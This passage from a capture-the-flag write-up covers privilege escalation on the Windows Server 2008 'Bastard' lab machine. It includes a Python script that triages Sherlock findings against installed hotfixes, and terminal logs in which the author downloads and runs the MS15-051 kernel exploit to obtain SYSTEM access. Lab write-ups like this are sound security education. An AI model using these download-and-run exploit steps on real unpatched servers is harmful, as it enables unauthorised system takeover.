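            info[key] = m.group(2).strip()
            continue
        m = ITEM_LINE.match(line)
        if m and key == "Hotfix(s)":
            info["hotfixes"].append(m.group(1).upper())
    return info


def arch(info):
    return "x64" if "x64" in info.get("System Type", "") else "x86"


def parse_sherlock(text):
    """One dict per Title/MSBulletin/CVEID/Link/VulnStatus record; console-wrapped
    continuation lines (long links) are glued back onto the previous field."""
    findings, cur, last = [], {}, None
    for line in text.splitlines():
        m = re.match(r"^\s*(Title|MSBulletin|CVEID|Link|VulnStatus)\s*:\s*(.*)$", line)
        if m:
            k, v = m.group(1), m.group(2).strip()
            if k == "Title" and cur:
                findings.append(cur)
                cur = {}
            cur[k], last = v, k
        elif line.strip() and last:
            cur[last] += line.strip()
    if cur:
        findings.append(cur)
    return findings


def triage(findings, info):
    """Bulletins Sherlock marks 'Appears Vulnerable' whose fixing KB is not installed.
    Sherlock itself already reports 32-bit-only exploits as not supported on x64."""
    installed = set(info["hotfixes"])
    keep = []
    for f in findings:
        if f.get("VulnStatus") != "Appears Vulnerable":
            continue
        kb = FIX_KB.get(f.get("MSBulletin"))
        if kb and kb.upper() in installed:
            continue
        keep.append(f["MSBulletin"])
    return keep


# Constructed excerpt of this box's systeminfo (see the full output above).
SAMPLE_SYSTEMINFO = """Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""
# Same host as it would look with KB3045171 installed (constructed for contrast).
SAMPLE_SYSTEMINFO_PATCHED = re.sub(
    r"Hotfix\(s\):\s*N/A",
    "Hotfix(s): 2 Hotfix(s) Installed.\n   [01]: KB3045171\n   [02]: KB976932",
    SAMPLE_SYSTEMINFO)

# Constructed excerpt of the Sherlock output above (five of the twelve records).
SAMPLE_SHERLOCK = """Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Appears Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Appears Vulnerable

Title      : 'mrxdav.sys' WebDAV
MSBulletin : MS16-016
CVEID      : 2016-0051
Link       : https://www.exploit-db.com/exploits/40085/
VulnStatus : Not supported on 64-bit systems

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
6-034?
VulnStatus : Not Vulnerable
"""

if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(arch(info), info["hotfixes"], triage(parse_sherlock(SAMPLE_SHERLOCK), info))
```

On this box the result is x64, no hotfixes, and three candidates (MS10-092, MS15-051, MS16-032); the `arch` value is what decides between the ms15-051.exe and ms15-051x64.exe builds in the archive used next.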
Of the three findings marked "Appears Vulnerable" (MS10-092, MS15-051, MS16-032), MS15-051 (CVE-2015-1701, the ClientCopyImage Win32k bug) is the one I went with: systeminfo shows "Hotfix(s): N/A" on build 7600, so the KB3045171 fix is certainly absent. A compiled exploit, with source, is in the SecWiki windows-kernel-exploits repository. As with any precompiled binary from a third-party repo, run it only in a lab or rebuild it from the included Source directory.
sudo wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip
--2022-02-21 20:16:02-- https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip
Resolving github.com (github.com)... 13.234.210.38
Connecting to github.com (github.com)|13.234.210.38|:443... connected.
HTTP request sent, awaiting response... 302 Found
└─$ sudo unzip MS15-051-KB3045171.zip
Archive: MS15-051-KB3045171.zip
creating: MS15-051-KB3045171/
inflating: MS15-051-KB3045171/ms15-051.exe
inflating: MS15-051-KB3045171/ms15-051x64.exe
creating: MS15-051-KB3045171/Source/
creating: MS15-051-KB3045171/Source/ms15-051/
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.cpp
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.filters
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.user
inflating: MS15-051-KB3045171/Source/ms15-051/ntdll.lib
inflating: MS15-051-KB3045171/Source/ms15-051/ntdll64.lib
inflating: MS15-051-KB3045171/Source/ms15-051/ReadMe.txt
creating: MS15-051-KB3045171/Source/ms15-051/Win32/
inflating: MS15-051-KB3045171/Source/ms15-051/Win32/ms15-051.exe
creating: MS15-051-KB3045171/Source/ms15-051/x64/
inflating: MS15-051-KB3045171/Source/ms15-051/x64/ms15-051x64.exe
inflating: MS15-051-KB3045171/Source/ms15-051.sln
inflating: MS15-051-KB3045171/Source/ms15-051.suo
┌──(rocky㉿kali)-[/opt]
└─$ cd MS15-051-KB3045171
┌──(rocky㉿kali)-[/opt/MS15-051-KB3045171]
└─$ ls
ms15-051.exe ms15-051x64.exe Source
┌──(rocky㉿kali)-[/opt/MS15-051-KB3045171]
└─$ sudo cp ms15-051x64.exe ~/hckbox/Bastard
Privilege escalation to SYSTEM
PS C:\temp> .\ms15-051x64.exe "whoami"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 3032 created.
==============================
nt authority\system
PS C:\temp> cd c:/
PS C:\> cd users
PS C:\users> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 19/3/2017 1:20 Administrator
d---- 19/3/2017 1:54 Classic .NET AppPool
d---- 19/3/2017 7:35 dimitris
d-r-- 14/7/2009 7:57 Public
PS C:\users> cd Administrator
PS C:\users\Administrator> ls
Key Takeaways
The initial shell came from the Drupal vulnerability (Drupalgeddon2). I expected JuicyPotato to work, since many others have used it for privilege escalation on this box, and I tried for two days, including a reset of the machine, without success. I then used the Sherlock privilege-escalation script to find the right exploit. MS15-051 applies to most Windows versions of that era where the hotfix is not installed, and systeminfo had already told us that this machine has no hotfixes at all. I could have gone straight to MS15-051 the moment I saw "Hotfix(s): N/A", but I kept trying to make JuicyPotato work before finally settling on MS15-051.